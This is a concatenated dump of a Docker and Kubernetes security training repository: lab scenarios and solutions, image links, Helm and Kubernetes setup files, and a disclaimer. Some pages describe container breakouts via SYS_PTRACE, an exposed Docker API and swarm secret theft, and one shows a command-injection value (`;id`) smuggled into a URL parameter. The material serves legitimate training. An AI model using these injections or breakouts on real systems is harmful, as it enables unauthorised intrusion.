-------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-network-inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-network-inspect.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-no-privileges.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-no-privileges.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-perform-changes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-perform-changes.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-volume-inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-volume-inspect.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/knwon-vulnerabilities.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/knwon-vulnerabilities.png -------------------------------------------------------------------------------- /gitbook/docker-image-audit/scenario.md: -------------------------------------------------------------------------------- 1 | # docker image analysis - Scenario 2 | 3 | * Find the backdoor or malicious command in this docker image by analysing it 4 | 5 | ```bash 6 | custom-htop 7 | ``` 8 | 9 | > Do this in the `student-vm` -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/images/docker-volume-inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-volumes-and-networks/images/docker-volume-inspect.png -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/images/docker-volumes-data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-volumes-and-networks/images/docker-volumes-data.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-architecture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-architecture.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-inspect-nginx.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-inspect-nginx.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-search-wpscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-search-wpscan.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/nginxalpine-container.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/nginxalpine-container.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/start-nc-listener.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/start-nc-listener.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/capabilities-ping-drop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/capabilities-ping-drop.png 
-------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/docker-client-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/docker-client-file.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/nc-student-listen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/nc-student-listen.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-apparmor-profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-apparmor-profile.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/access-docker-swarm-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/access-docker-swarm-app.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/access-docker-swarm-env.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/access-docker-swarm-env.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-interactive-bash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-interactive-bash.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-stop-and-remove.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-stop-and-remove.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/privileged-container-kmsg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/privileged-container-kmsg.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/images/misconfig-nmap-scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-misconfiguration/images/misconfig-nmap-scan.png -------------------------------------------------------------------------------- 
/gitbook/auditing-docker-containers/images/docker-image-packages-query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-image-packages-query.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-inspect-for-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-inspect-for-socket.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-run-welcome-ubuntu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-run-welcome-ubuntu.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-container-namespaces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-container-namespaces.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/images/docker-tcp-host-access.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-misconfiguration/images/docker-tcp-host-access.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/images/misconfig-curl-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-misconfiguration/images/misconfig-curl-images.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-exploit.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-node-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-node-app.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-volume-sensitive-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-volume-sensitive-info.png -------------------------------------------------------------------------------- 
/gitbook/exploiting-cluster-secrets/images/docker-swarm-search-locations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/docker-swarm-search-locations.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-analysis-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-analysis-secrets.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-registry-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-registry-access.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/download-image-locally.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/download-image-locally.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-access-host-flag.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-access-host-flag.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-download-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-download-payload.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-msfvenom-generate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-msfvenom-generate.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-payload-execution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-payload-execution.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/docker-secrets-default-location.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/docker-secrets-default-location.png 
-------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-start-python-server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-start-python-server.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mont-reverse-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mont-reverse-shell.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-docker-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-docker-socket.png -------------------------------------------------------------------------------- /infra-setup/README.md: -------------------------------------------------------------------------------- 1 | # Infrastructure Setup 2 | 3 | ## Requirements 4 | 5 | * Kubernetes Cluster 6 | * `kubectl` configured to use cluster 7 | * Helm v2 8 | 9 | ## Deploy Lab Environment 10 | 11 | ``` 12 | cd infra-setup 13 | ./setup.sh 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-registry-access-image.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-registry-access-image.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-system-info-registries.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-system-info-registries.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-registry-config-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-registry-config-secrets.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/accessing-host-system-using-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/accessing-host-system-using-socket.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-vulnerable-parameter.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-vulnerable-parameter.png -------------------------------------------------------------------------------- /gitbook/environment-setup/common-troublehshooting-steps.md: -------------------------------------------------------------------------------- 1 | # Common Troubleshooting Steps 2 | 3 | * If you encounter the `REMOTE HOST IDENTIFICATION CHANGED` error, remove the conflicting entry by running the command printed in the warning. This warning is SSH's protection against man-in-the-middle attacks: in this lab it is expected when a VM has been re-created with a new host key, but outside the lab only remove the entry if you know why the host key changed 4 | 5 | ![ssh host key error](images/ssh-host-key-error.png) -------------------------------------------------------------------------------- /gitbook/docker-image-audit/solution.md: -------------------------------------------------------------------------------- 1 | # docker image analysis - Solution 2 | 3 | * Run the below command to show the history of a docker image. This lists the instructions used to build each layer, so anything baked into the image at build time (for example a secret in a `RUN` or `ENV` instruction) is visible here; add `--no-trunc` to see the full, untruncated commands 4 | 5 | ```bash 6 | docker history custom-htop 7 | ``` 8 | 9 | ![docker history](images/docker-history.png) -------------------------------------------------------------------------------- /gitbook/kubernetes-101/children-guide.md: -------------------------------------------------------------------------------- 1 | # The Illustrated Children's Guide to Kubernetes 2 | 3 | [![The Illustrated Children's Guide to Kubernetes](https://img.youtube.com/vi/4ht22ReBjno/0.jpg)](https://www.youtube.com/watch?v=4ht22ReBjno) 4 | 5 | source: [https://www.youtube.com/watch?v=4ht22ReBjno](https://www.youtube.com/watch?v=4ht22ReBjno) 6 | -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/scenario.md: -------------------------------------------------------------------------------- 1 | # Exploiting Cluster Secrets 2 | 3 | In this scenario we will see how to exploit an application to access 
docker swarm cluster secrets. 4 | 5 | * The application running in the CTF VM has a command injection (remote code execution) vulnerability in the `domain` parameter, e.g. `http://CTFVMIP:8080/?domain=;id`, and is running in docker swarm with secrets attached; Swarm mounts attached secrets into the container filesystem, which is what we will read through the injection -------------------------------------------------------------------------------- /gitbook/automated-defense-for-container-security/demo.md: -------------------------------------------------------------------------------- 1 | # Automated Defense for Container Security - DEMO 2 | 3 | In this scenario we will see how we can detect a sensitive file read operation occurring inside a container in a Kubernetes cluster. 4 | 5 | We will see how to apply automated defense to automatically stop the attack and apply the fix in near-realtime. 6 | 7 | 8 | 9 | ## DEMO -------------------------------------------------------------------------------- /gitbook/popular-attacks/metadata.md: -------------------------------------------------------------------------------- 1 | # Shopify metadata to cluster pwn 2 | 3 | A Server-Side Request Forgery (SSRF) vulnerability in one of the containers running in a Kubernetes cluster allowed an attacker to reach the cloud instance metadata service and, from there, gain control over the entire Shopify cluster and its instances. 4 | 5 | * Read more about [SSRF to ROOT access in all instances](https://hackerone.com/reports/341876) 6 | -------------------------------------------------------------------------------- /gitbook/extra/katacoda.md: -------------------------------------------------------------------------------- 1 | # Katacoda Docker Security 2 | 3 | Learn Docker Security using Interactive Browser-Based Scenarios. 
Solve real problems and enhance your skills with browser based hands on labs without any downloads or configuration 4 | 5 | ![Katacoda Docker Security](images/katacoda.png) 6 | 7 | ### References 8 | 9 | * [https://www.katacoda.com/courses/docker-security](https://www.katacoda.com/courses/docker-security) -------------------------------------------------------------------------------- /gitbook/popular-attacks/dockerhub-190k.md: -------------------------------------------------------------------------------- 1 | # Dockerhub 190k accounts hacked 2 | 3 | Docker Hub has been compromised very recently and this attack has put almost 190K users at risk. More details pointing to discussion at [Hacker News](https://news.ycombinator.com/item?id=19763413) 4 | 5 | 6 | * [Some tips to review Docker Hub Hack of 190k accounts](https://blog.madhuakula.com/some-tips-to-review-docker-hub-hack-of-190k-accounts-addcd602aade) -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Private Registry - Scenario 2 | 3 | Organization hosting their infrastructure in containers with help of orchestration and clustering. Organization uses automated deployments using continuous integration and continuous delivery. All the containers will be stored in centralized private registry. Identify the sensitive information from the registry. 
4 | 5 | ### Target 6 | 7 | 165.22.221.65 8 | -------------------------------------------------------------------------------- /gitbook/getting-started/configure-kubectl.md: -------------------------------------------------------------------------------- 1 | # Configure the `kubectl` 2 | 3 | * Start Kubernetes student VM 4 | * Copy your configuration file `k8s-training-kubeconfig` to `/home/student/.kube/config` and restrict its permissions with `chmod 600 /home/student/.kube/config`: the kubeconfig holds the cluster credentials, so do not share it or commit it anywhere 5 | * The file `k8s-training-kubeconfig` is generated by the `setup.sh` script as part of cluster creation 6 | * Run the below command to confirm that everything works fine 7 | 8 | ```bash 9 | kubectl get pods 10 | ``` 11 | 12 | ![](images/kubectl-get-pods.png) 13 | -------------------------------------------------------------------------------- /infra-setup/helm-rbac/helm-rbac.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: tiller 5 | namespace: kube-system 6 | --- 7 | apiVersion: rbac.authorization.k8s.io/v1 8 | kind: ClusterRoleBinding 9 | metadata: 10 | name: tiller 11 | roleRef: 12 | apiGroup: rbac.authorization.k8s.io 13 | kind: ClusterRole 14 | name: cluster-admin 15 | subjects: 16 | - kind: ServiceAccount 17 | name: tiller 18 | namespace: kube-system 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 
4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *~ 18 | # Various IDEs 19 | .project 20 | .idea/ 21 | *.tmproj 22 | .vscode/ 23 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *~ 18 | # Various IDEs 19 | .project 20 | .idea/ 21 | *.tmproj 22 | .vscode/ 23 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *~ 18 | # Various IDEs 19 | .project 20 | .idea/ 21 | *.tmproj 22 | .vscode/ 23 | -------------------------------------------------------------------------------- /gitbook/intro/disclaimer.md: -------------------------------------------------------------------------------- 1 | # Disclaimer 2 | 3 | - The attacks covered in the training are for educational purposes only. 
Do not test or attack any system outside of the scope of this training lab unless you have express permission to do so 4 | - The snippets, commands and scripts used throughout the training are not production-ready, may not be bug-free and are not guaranteed in any way 5 | 6 | ![5 year jail term for hacking unauthorized computers and networks according to the Indian IT Act 2000](images/warning.png) 7 | -------------------------------------------------------------------------------- /gitbook/extra/contianed-af.md: -------------------------------------------------------------------------------- 1 | # Contained.af 2 | 3 | > Game for learning about containers, capabilities, and syscalls by [@jessfraz](https://github.com/jessfraz) 4 | 5 | There is a CTF on every VM instance. If you manage to break out of the container, email `not.quite@contained.af` and you will be rewarded. If you bother this email address with anything that is not the ascii art contents of the flag file you will be ignored. 6 | 7 | ![Contained.af Game](images/contained-af.png) 8 | 9 | * Play the game at [https://contained.af](https://contained.af/) -------------------------------------------------------------------------------- /gitbook/popular-attacks/service-token.md: -------------------------------------------------------------------------------- 1 | # BSidesSF CTF cluster pwn 2 | 3 | The challenges for the BsidesSF CTF were run in Docker containers on Kubernetes using Google Container Engine. Because of the two infrastructure issues, it was possible to exploit one of the early challenges, steal service account keys, and then use those keys to directly access flags. 
4 | 5 | * Read more about [Capturing all the flags in BSidesSF CTF by pwning our infrastructure](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Container Capabilities - Scenario 2 | 3 | In this scenario we will exploit a container that has the `SYS_PTRACE` capability and shares the host `PID` namespace. Together these let a process inside the container see and attach to processes running on the host, which we will use to break out of the container and access the host system. We assume that the attacker already has access to the container for this scenario. 4 | 5 | * Login to the container using below command. Ensure that you run this in the `CTF` vm 6 | 7 | ```bash 8 | docker exec -it sysmon bash 9 | ``` 10 | 11 | ![docker exec into sysmon](images/sysmon-access.png) -------------------------------------------------------------------------------- /gitbook/logging-and-monitoring/readme.md: -------------------------------------------------------------------------------- 1 | # Logging and Monitoring for Kubernetes 2 | 3 | We can get more detailed information about kubernetes and its resources using built-in commands 4 | 5 | * Looking for more information about a pod (replace `<pod-name>`) 6 | 7 | ```bash 8 | kubectl describe pod <pod-name> 9 | ``` 10 | 11 | * Looking for the logs of a pod (replace `<pod-name>`) 12 | 13 | ```bash 14 | kubectl logs -f <pod-name> 15 | ``` 16 | 17 | * Looking for complete information about the cluster (to debug and diagnose cluster problems). The dump includes pod logs and cluster configuration, so treat its output as sensitive 18 | 19 | ```bash 20 | kubectl cluster-info dump 21 | ``` 22 | 23 | * Stack driver logging 24 | 25 | ![](images/stack-driver.png) -------------------------------------------------------------------------------- /gitbook/environment-setup/ssh-into-machine.md: -------------------------------------------------------------------------------- 1 | # SSH into machines 2 | 3 | ## SSH into the student 
machine 4 | 5 | * Run the following command from your terminal. Make sure you replace the `STUDENTVMIP` ip address with your student vm ip address 6 | 7 | ```bash 8 | ssh student@STUDENTVMIP 9 | ``` 10 | 11 | ![ssh into student vm](images/student-ssh.png) 12 | 13 | 14 | ## SSH into the ctf machine 15 | 16 | * Run the following command from your terminal. Make sure you replace the `CTFVMIP` ip address with your ctf vm ip address 17 | 18 | ```bash 19 | ssh ctf@CTFVMIP 20 | ``` 21 | 22 | ![ssh into ctf vm](images/ctf-ssh.png) 23 | -------------------------------------------------------------------------------- /gitbook/getting-started/import-vm.md: -------------------------------------------------------------------------------- 1 | # Download Kubernetes Student VM 2 | 3 | * http://www.mediafire.com/file/b739545szyrc6i5/kubernetes-security.ova/file 4 | * http://www.mediafire.com/file/asz5xukxg1lhs3r/kubernetes-security.ova.checksum/file 5 | 6 | # Import VM 7 | 8 | * Click on Virtual Box `File` -> `Import` 9 | 10 | * Verify the downloaded OVA against the published `.checksum` file first, then browse to the ova of k8s-security and import the file 11 | ![](images/select-import.png) 12 | 13 | * Click on Import 14 | ![](images/import.png) 15 | 16 | ![](images/process.png) 17 | 18 | 19 | * Login to the vm using the default lab credentials below (change the password if the VM is reachable from a network you do not control) 20 | 21 | ```bash 22 | username: student 23 | password: hackk8s 24 | ``` -------------------------------------------------------------------------------- /gitbook/automated-defense/readme.md: -------------------------------------------------------------------------------- 1 | # Security checks for events using Sysdig Falco (DEMO Only) 2 | 3 | In this scenario we will see how we can detect a sensitive file read operation occurring inside a container in a Kubernetes cluster. 4 | 5 | We will see how to apply automated defense to automatically stop the attack and apply the fix in near-realtime. 
6 | 7 | ## DEMO 8 | 9 | [![Container Security Monitoring - Automated Defense](https://img.youtube.com/vi/zd0ksjZI5Vk/0.jpg)](https://www.youtube.com/watch?v=zd0ksjZI5Vk) 10 | 11 | source: [https://www.youtube.com/watch?v=zd0ksjZI5Vk](https://www.youtube.com/watch?v=zd0ksjZI5Vk) 12 | -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/solution.md: -------------------------------------------------------------------------------- 1 | # Docker Volumes - Solution 2 | 3 | * Inspecting docker volumes 4 | 5 | ```bash 6 | docker volume inspect 1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67 7 | ``` 8 | 9 | ![docker volume inspect](images/docker-volume-inspect.png) 10 | 11 | * Looking for sensitive data and secrets 12 | 13 | ```bash 14 | sudo -i 15 | cd /var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data 16 | ls 17 | grep -i 'flag' wp-config.php 18 | grep -i 'password' wp-config.php 19 | ``` 20 | 21 | ![looking for data in volumes](images/docker-volumes-data.png) 22 | -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/README.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Containers 2 | 3 | Auditing `docker` containerised environment from a security perspective involves identifying security misconfigurations while deploying and running docker containers. Auditing docker containers and its runtime environment requires inspecting the following components. 4 | 5 | * Docker images 6 | * Docker containers 7 | * Docker networks 8 | * Docker registries 9 | * Docker volumes 10 | * Docker runtime 11 | 12 | In this section we will explore tools and techniques that allows an auditor to effectively perform a security audit of docker based containerised environment. 
-------------------------------------------------------------------------------- /infra-setup/net-tools/net-tools.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: net-tools-deployment 5 | labels: 6 | app: net-tools 7 | spec: 8 | replicas: 1 9 | selector: 10 | matchLabels: 11 | app: net-tools 12 | template: 13 | metadata: 14 | labels: 15 | app: net-tools 16 | spec: 17 | containers: 18 | - name: net-tools 19 | image: appsecco/k8s-training-netscan-tools:latest 20 | resources: 21 | limits: 22 | cpu: 50m 23 | memory: 100Mi 24 | requests: 25 | cpu: 40m 26 | memory: 80Mi 27 | -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/scenario.md: -------------------------------------------------------------------------------- 1 | # Exploiting docker misconfiguration - Scenario 2 | 3 | In this scenario we will see a misconfigured `docker` instance with its API exposed on a TCP port on the network. We will use this with the docker client's remote host option to access the containers and images and gain host system privileges. 4 | 5 | > The Docker daemon can listen for Docker Engine API requests via three different types of Socket `unix`, `tcp`, and `fd`. To access remotely we have to enable `tcp` socket. Enabling the `tcp` socket without TLS provides un-encrypted and un-authenticated direct access to the Docker daemon, and because the daemon runs as root, anyone who can reach that port effectively has root on the host. 
